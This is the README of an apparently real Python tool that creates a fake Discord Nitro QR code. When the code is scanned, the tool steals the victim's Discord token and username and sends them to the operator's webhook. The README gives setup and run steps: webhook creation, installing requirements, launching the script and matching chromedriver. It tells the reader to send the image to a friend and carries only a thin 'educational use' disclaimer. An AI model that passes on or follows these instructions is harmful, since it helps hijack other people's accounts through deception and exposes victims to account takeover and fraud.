Discord Token Grabber via QR code
A Python script that automatically generates a fake Discord Nitro QR code that then grabs the Discord token and username when scanned. It then sends it back to a specified Discord Webhook.
This tool is for educational use only, the author will not be held responsible for any misuse of this tool.
You will first need to make a discord Webhook(https://www.youtube.com/watch?v=fKksxz2Gdnc) and paste your webhook in line 13
Install requirements :
pip3 install -r requirements.txt
Then if steps above were succesful you can now launch the python file by doing python Discord-QR.py
, it will then create a fake discord nitro QR code in the same directory. Copy that image and send it to a friend. Once they scan it you get there discord token sent to you via the webhook.
Requirements:
Python3, Windows(x64), Google Chrome
- Make sure your chromedriver.exe file is the same version as your Chrome web browser version
- Download the latest version chromedriver.exe here: https://chromedriver.chromium.org/downloads
- Then replace the chromedriver.exe file in the folder.